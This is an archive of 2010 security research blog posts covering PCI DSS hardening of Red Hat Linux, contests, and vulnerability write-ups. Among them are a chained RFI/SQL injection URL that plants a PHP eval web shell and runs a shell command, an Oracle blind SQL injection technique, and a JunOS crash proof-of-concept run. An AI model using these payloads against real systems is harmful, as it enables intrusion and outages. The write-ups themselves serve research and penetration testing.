December 30, 2010

SecurityLab.ru summarizes the results of HackQuest 2010 competition

The SecurityLab.ru portal and the Positive Technologies company have held an open information security competition, HackQuest 2010.

Over 750 experts from all over the world participated in it, but only 8 of them managed to get through the entire competition. The competition leaders will receive not only prizes but also job offers from the key information security companies that sponsored the event.

The SecurityLab.ru portal celebrated its tenth anniversary on December 15, 2010. Development of this site devoted to information security started in 2000. During these ten years, SecurityLab.ru has grown from a small site into the leading Russian-language information security portal.

December 15, 2010

Hack Quest 2010 Online

The SecurityLab.ru portal invites all comers to participate in an online information protection contest - Hack Quest 2010. The contestants will try their skills in security assessment, the search for and exploitation of vulnerabilities, reverse engineering, and just plain hacking. Prizes are waiting for the winners!

The game infrastructure was not initially planned as an online contest, so, unfortunately, all the interfaces of the contest are in Russian. However, this should not prevent foreign participants from joining :)

December 14, 2010

Google Hall of Fame

The “Google Security Reward” program has attracted the attention of many researchers. This program provided them with a legal opportunity to analyze the security of Google services and applications. Researchers were allowed to examine not only applications like Google Chrome, but also interactive services: the search engine google.com, the mail service gmail.com, the video service youtube.com, the blog service blogger.com, and the social network service orkut.com.
The experts from the “Positive Research” Center, which is the innovation department of the Positive Technologies Company, have also joined the program. As a result of the analysis performed by the experts of the “Positive Research” Center, several vulnerabilities of various risk levels were detected; these vulnerabilities were then analyzed and eliminated by Google specialists. As a reward for helping make Google products safer, the “Positive Research” Center team was inducted into the virtual Google Security Hall of Fame (http://www.google.com/corporate/halloffame.html).

XSS

Clickjacking

November 22, 2010

PCI DSS and Red Hat Enterprise Linux (Final part #9)

Requirement A.1: Shared hosting providers must protect the cardholder data environment

Abstract

The most obvious method to fulfill the requirements given in section A.1 is to assign to every client a virtual server (or a set of servers) that meets the requirements from the chapters described above.
There are no analogous requirements in the CIS standards.

November 8, 2010

PCI DSS and Red Hat Enterprise Linux (Part #8)

Requirement 10: Track and monitor all access to network resources and cardholder data

Abstract

The technically implementable requirements given in this chapter concern the syslog server, the kernel-level audit system auditd, NTP server settings, and an integrity control system. There are almost no analogous items in the CIS standards.

October 20, 2010

PCI DSS and Red Hat Enterprise Linux (Part #7)

Requirement 8: Assign a unique ID to each person with computer access

Summary

Most requirements presented in this chapter concern the Linux password policy, which is described in detail by CIS.

October 11, 2010

PCI DSS and Red Hat Enterprise Linux (Part #6)


Requirement 7. Limit access to system components and cardholder data to only those individuals whose job requires such access

7.2.1 Examine system settings and vendor documentation to confirm that access control systems are in place on all system components

The previous item was about data access control, and this one concerns user access isolation. Let us consider all widespread mechanisms of user privilege restriction. The examples contain listings of commands executed with root privileges, a user named user for whom various permissions will be set, and a user named superadmin who, despite the grand name, will not have the mentioned permissions.

September 19, 2010

Fuzzing of a Mod_rewrite "Protected" Site

Increasingly often one encounters sites on the Internet that hide the parameters passed to an application using the mod_rewrite Apache module. Web developers often have the illusion that this protects a web application against attacks such as SQL Injection, Cross-Site Scripting, etc. In fact, this is a common delusion, similar to the delusion that hiding the “fingerprints” of services improves their security. There is no doubt that using mod_rewrite to hide parameters passed to an application, just like hiding fingerprints, is a certain obstacle for an attacker. However, as they say, “there is no obstacle that cannot be surmounted”.

September 17, 2010

Chaos Constructions 2010 (resume)

At the end of last month the traditional computer festival Chaos Constructions 2010 took place. Chaos Constructions (CC) is an annual festival held at the end of August in St. Petersburg. Since 2006 its format has been similar to that of a LAN party.

The CC festival started in 1995 as a "demo party": a competition between programmers, artists and musicians in several categories, the main one being the "demo", a program with size limitations that usually looks like a video clip but is rendered as animation (video can be used only in short fragments). As a rule, a demo is a program that demonstrates realistic 3D graphics by means of specialized, complex calculations. In most cases this is true, but earlier (and sometimes now) a demo was considered to be a kind of story, with the special effects being just a means to make the story more understandable.

September 3, 2010

PCI DSS and Red Hat Enterprise Linux (Part #5)

Requirement 7. Limit access to system components and cardholder data to only those individuals whose job requires such access

Summary
Both requirements given in this section are rather complex; many sub-systems are involved in configuring the OS in compliance with these requirements. The CIS RHEL analogs of requirement 7.2.1 are contained in items 8.1, 8.2, 8.5, 8.8, 9.2, 9.8, 9.11, SN.7, and SN.11, but these analogs don’t cover all access isolation mechanisms available in the system. Partial CIS analogs of requirement 7.1.1 are presented in items 7.2 and 7.6.

September 1, 2010

PCI DSS and Red Hat Enterprise Linux (Part #4)


Requirement 4. Encrypt transmission of cardholder data across open, public networks

Summary

This chapter gives the data encryption requirements, which have no CIS analogs. The key ideas are: the use of tools for VPN channel creation, support for web traffic encryption, and the use of certificates.


August 20, 2010

Web Crawler Beta Released!

Web Crawler - first public beta release is out!

Introduction
Crawler is a utility designed for testing and demonstrating the features of the WebEngine open-source library. This program gathers information about the resources of a specified web server by analyzing references in the HTML markup, text, and JavaScript code. Additionally, a query is sent to the Web Of Trust knowledge base to obtain information about the analyzed site. This check demonstrates the analysis of web application vulnerabilities.
First and foremost, please do not be evil. Use Crawler only against services you own or have permission to test. The given application is not a full-fledged analyzer of web application security.

Furthermore, the library is currently not meant for scanning rogue and misbehaving HTTP servers; in these cases, correct and stable operation cannot be guaranteed.
The main features provided by the application are listed below:
  • JavaScript analysis aimed at extracting references, with simulation of the DOM structure
  • Support for the Basic, Digest, and NTLM authorization schemes
  • Access to the contents of web servers via HTTP
  • Operation via proxy servers with various authorization schemes
  • A wide variety of options to describe the scan target (lists of scanned domains; restriction of scanning to a host, a domain, or a web server directory; etc.)
  • Modular structure, which allows one to implement plug-ins

Web Crawler GUI - Scan Results Example

Web Crawler GUI - Profiles, Plugins

August 6, 2010

PCI DSS and Red Hat Enterprise Linux (Part #3)

Author: Feodor Kulishov

[Part #1] [Part #2]

<...>

Requirement 3: Protect stored cardholder data

3.4.1.a If disk encryption is used, logical access must be managed independently of native operating system access control mechanisms

The essence of the requirement is that access to decrypted data should be allowed only if the key is known; thereby, any processes and users (even system administrators) will be unable to read and modify such data correctly if they do not have the decryption key.

For all widespread mechanisms of encryption of Linux file systems (cryptsetup, cryptsetup + LUKS, EncFS, eCryptFS), the decrypted file system (FS) is logically identical to an ordinary one and has the same access attributes, ACLs, etc. This is how the transparency property of the file system is implemented. However, even if the data access rights are specified correctly, root and processes with UID=0 will be able to access any data after it has been decrypted by the key owner; this means that the given PCI DSS requirement is not fulfilled by any of the Linux file system encryption mechanisms.

August 5, 2010

Another alternative for NULL byte

Undoubtedly, many of you remember that Raz0r brought up the question of an alternative to the NULL byte about a year ago, and the ush group conducted corresponding investigations devoted to this problem [1, 2, and 3]. By the way, yours truly added a new method to the MaxPatrol knowledge base at the same time and supplemented the method implementation with some elaborations of my own [4].

So, why do I touch on this topic again? The thing is that the mentioned method was based on the idea of cutting off the end of the file name (the extension) that gets into the include. This is possible because PHP uses path normalization and fails to access a path exceeding MAX_PATH. Well, why can’t we use the same PHP restriction (the MAX_PATH value) and try to pad the file name to that length from the beginning instead? This idea occurred to a young man (Yuri Goltsev) who was asked a relevant question at a job interview. And it must work indeed!

July 21, 2010

Stuxnet attacks! One more Zero-day for Microsoft Windows

Despite its attack vector, the new worm exploiting a shortcut-processing vulnerability is becoming very widespread. It would seem that this malware distribution vector should have become inefficient long ago, because this method of spreading worms has been used since the time of Elk Cloner (1982). However, 28 years later, we face this attack vector again, but the infection speed has become much higher and the scale much wider.

Event Chronology

10.07.2010
The Belarusian antivirus company VirusBlokAda (VBA) reports detection of a new malicious program.
The US-CERT receives notification of an attack exploiting a 0-day vulnerability in Microsoft Windows.

15.07.2010
Information about the vulnerability becomes publicly available.

16.07.2010
Microsoft issues a security bulletin that confirms the presence of the vulnerability.

19.07.2010
An exploit becomes publicly available.

July 19, 2010

Red Card: Specificity of PCI DSS in respect to Red Hat Enterprise Linux (Part 2)

Requirement 2: Do not use vendor-supplied defaults for system passwords and other security parameters

Summary

The requirements presented in this chapter are much more closely aligned with the CIS than those from the previous chapter. The corresponding items of the CIS RHEL are chapters 3 and 4 and paragraphs 2.3, 8.2, 9.4, 11.2, and SN.8. However, in addition to OS settings, it will be necessary to apply external tools, such as port scanners and password crackers.

2.1 Always change vendor-supplied defaults before installing a system on the network

This concerns the passwords of network devices and Wi-Fi access points, SNMP community strings, etc. The requirement implies a manual check (which is absolutely necessary in most cases), but most of the routine work can be avoided by applying a special network or offline password cracking tool.

July 9, 2010

Red Card: Specificity of PCI DSS in respect to Red Hat Enterprise Linux (Part 1)

Author: Feodor Kulishov

In the present article, we will discuss the configuration of a standard Linux system (as well as the standard software supplied with the distribution kit) in accordance with the PCI DSS, using RHEL 5 and Fedora Core 12 as examples. For each requirement of the standard, recommended system settings will be given based on the existing technical standards (CIS, NIST, SANS) and on experience in configuring such systems.
RedHat Enterprise Linux was chosen as the target Linux distribution because it receives (along with Novell SUSE Enterprise Linux Server/Desktop) the broadest support from hardware and software vendors and offers a wide variety of commercial support options. This is why the considered system is widely used in the business community, including the payment card industry. FC12 serves as the base for the future RHEL6.
Note. The present publication represents only one point of view on the problem of auditing compliance with the PCI DSS requirements. Auditors who examine particular data processing systems may have their own vision of secure settings, which may differ from the recommendations given in this article, because some items of the standard allow various interpretations. Nevertheless, this work can serve as a starting point for obtaining RH systems that are not only compliant with the standard’s requirements, but also have safe configurations.

June 7, 2010

Web application vulnerability statistics 2009

The many years of assessment practice of the PT Research analytic center and the experience of the Positive Technologies company in penetration testing and information security auditing show that errors in web application protection are still among the most common information security shortcomings. Moreover, web application vulnerabilities represent one of the most widespread ways for attackers to penetrate enterprise information systems; there are many factors that make web services an attractive target for attacks.

When designing applications, developers usually direct their best efforts at implementing functionality; the problems of information security and code quality are given short shrift. As a result, the overwhelming majority of web applications contain vulnerabilities of various risk levels.

May 27, 2010

RusCrypto CTF 2010 Full Disclosure

RusCrypto CTF is an open competition in information security held according to the Capture The Flag principle. At the beginning of the game, all teams have identical servers with vulnerable services installed.

Besides vulnerabilities in specially designed services, there are vulnerabilities common to real information systems: weak passwords, known vulnerabilities in the OS and services, configuration errors, and real vulnerabilities in web applications (such as popular CMSs).

During the competition, changes can be made to the systems that introduce additional vulnerabilities into competitors’ services. The competitors’ goal is to detect the vulnerabilities and eliminate them on their own servers without breaking server operation. Competitors should also use similar vulnerabilities on competitors’ servers to capture flags.

May 1, 2010

The RusCrypto’2010 Conference

Last month, the 12th international conference RusCrypto’2010, devoted to modern cryptology methods, digital signature technologies, and information security systems and tools, took place.

The RusCrypto conference is a place where cryptography and information security experts can communicate. Developers and their potential customers, scientists and officials, and specialists from business corporations and public institutions take part in this event. RusCrypto covers both theory and practice, and includes the presentation of innovative technologies and an exchange of views.

April 29, 2010

WASC WSTCv2 Mapping Proposal

While completing the vulnerability statistics on Russian web applications for 2009 (its release is rather late this year) [1,2,3 in Russian], I suddenly realized that there is no mapping between the WASC WSTCv2 and SANS/CWE Top 25 2010 vulnerability titles. As there is no such mapping on the official resource [4], I suggest my own version.

January 25, 2010

Methods of quick exploitation of blind SQL Injection Vulnerabilities in Oracle

I had gathered an interesting collection of quick methods of blind SQL Injection exploitation, but I lacked a similar method for another widespread DBMS, Oracle. This induced me to conduct a small piece of research intended to discover analogous methods applicable to that database.

I found out that all known methods of error-based Blind SQL Injection exploitation don’t work in the Oracle environment. Then my attention turned to the functions for interacting with the XML format. After a short investigation, I found the function XMLType(), which returns the first character of the requested data in the error message (LPX-00XXX):

SQL> select XMLType((select 'abcdef' from dual)) from dual;
ERROR:
ORA-31011: XML parsing failed
ORA-19202: Error occurred in XML processing
LPX-00210: expected '<' instead of 'a'
Error at line 1
ORA-06512: at "SYS.XMLTYPE", line 301
ORA-06512: at line 1
no rows selected
SQL>

January 12, 2010

RFI over SQL Injection/Cross-Site Scripting

An amusing attack was demonstrated during a recent penetration test. It is a good example of the practical application of Cross-Site Scripting. We had the following situation:

- User segment with an attacker (me) operating from it;
- Technological network with strictly restricted outgoing traffic;
- A web application in the technological network that is vulnerable to Remote File Including (RFI);
- A web application in the technological network that is vulnerable to SQL Injection.

The SQL Injection per se didn’t allow us to realize any useful threats and develop the attack (here it is, the dreadful effect of privilege minimization!). We also could not use the RFI vulnerability, because the traffic outgoing from the technological segment to the user segment and to the external environment was strictly restricted. To exploit the RFI vulnerability, a chain like the following one was implemented:

http://<application_vulnerable_to_RFI>/?param=http://<application_vulnerable_to_SQLi>/?param=1+union+select+'<?eval($_request[cmd]);?>'&cmd=passthru('ls');

That is, each of these three vulnerabilities taken separately was useless. Only when they were combined for the common good did they allow us to realize an information security threat, namely the execution of arbitrary commands on the server :)

All in all, there is nothing supernatural here, but I found this attack to be rather amusing...

January 11, 2010

Magic Quotes


During a recent penetration test, I had occasion to work with the following web application architecture:

I guess you will ask me, what’s wrong here?

The problem is that Oracle is not MySQL, and it simply doesn’t "know" about any escaping in the form of backslashes :) Oracle doesn’t consider the concept of backslash escaping at all, because it’s a serious DBMS:

Methods of Quick Exploitation of Blind SQL Injection

A couple of days ago TinKode attracted everybody’s attention by breaking into a web site in the army.mil domain. The server onestop.army.mil was attacked, and the researcher found a Blind SQL Injection vulnerability on it.

A logically true query:

A logically false query:

This time, I was most interested not in the fact of the server compromise, but in the technique applied to exploit the Blind SQL Injection vulnerability on the MSSQL 2000 DBMS:

January 7, 2010

Juniper JUNOS Remote Kernel Crash Flaw!

"Juniper Networks is warning customers of a critical flaw in its gateway routers that allows attackers to crash the devices by sending them small amounts of easily-spoofed traffic." - The Register news.

The JunOS kernel will crash (i.e. core dump) when a specifically crafted TCP option is received on a listening TCP port. The packet cannot be filtered with the Junos firewall filter. A router receiving this specific TCP packet will crash and reboot.

Affected Devices:
JunOS 3.x - 10.x (versions released later than 1/28/2009)
Software releases built on or after January 28, 2009 have already fixed the issue.
Solution:
Upgrade the OS. There are no fully effective workarounds.

Funny:
"A Juniper spokeswoman said the bulletin was one of seven security advisories the company issued under a policy designed to prevent members of the public at large from getting details of the vulnerabilities."
"Because of Juniper's 'Entitled Disclosure Policy,' only our customers and partners are allowed access to the details of the Security Advisory," the spokeswoman wrote.
Ooohhh... How about this: "when a specifically crafted TCP option is received on a listening TCP port"?
It's more than enough! We have 256 guesses ;)

Simple Proof-of-Concept demo:

hod# ping 169.254.1.1
PING 169.254.1.1 (169.254.1.1): 56 data bytes
64 bytes from 169.254.1.1: icmp_seq=0 ttl=254 time=4.623 ms
64 bytes from 169.254.1.1: icmp_seq=1 ttl=254 time=4.531 ms
64 bytes from 169.254.1.1: icmp_seq=2 ttl=254 time=4.315 ms
^C<...>

hod# ./hod-junos-test 169.254.1.1 22
[*] Target IP: 169.254.1.1, Port: 22
[+] Sending TCP-packets with various crafted TCP options
[+] TCP options bruteforce progress:
[..........................................................
...........................................................
...........................................................
.......................................................]
[+] OK

hod# ping 169.254.1.1
PING 169.254.1.1 (169.254.1.1): 56 data bytes
Request timeout for icmp_seq 0
Request timeout for icmp_seq 1
Request timeout for icmp_seq 2
^C

256 packets and the JunOS router is dead, and after analyzing the sniffed traffic we know the true "evil" TCP packet!

The JUNOS firewall filter (ACL) is unable to filter a TCP packet with this issue!
Successful exploitation requires knowledge of a listening remote TCP port (open or firewall-filtered, it doesn't matter at all).
For example, attackers can blindly send many crafted packets to "well known" TCP ports (22/SSH, 179/BGP and others).
And that's enough.

January 5, 2010

WASC Threat Classification v2.0 is Out!

"The Threat Classification is an effort to classify the weaknesses, and attacks that can lead to the compromise of a website, its data, or its users."

The WASC Threat Classification is a cooperative effort to clarify and organize the threats to the security of a web site. The members of the Web Application Security Consortium have created this project to develop and promote industry standard terminology for describing these issues. Application developers, security professionals, software vendors, and compliance auditors will have the ability to access a consistent language and definitions for web security related issues.

WASC Threat Classification v2.0 Online:
http://projects.webappsec.org/Threat-Classification

What's new in the Threat Classification v2:
* Expanded Mission Statement
* Clarified terminology
* Proper Classification of threats into Attacks and Weaknesses for static/core view
* Base foundation allowing for the introduction of views into future releases.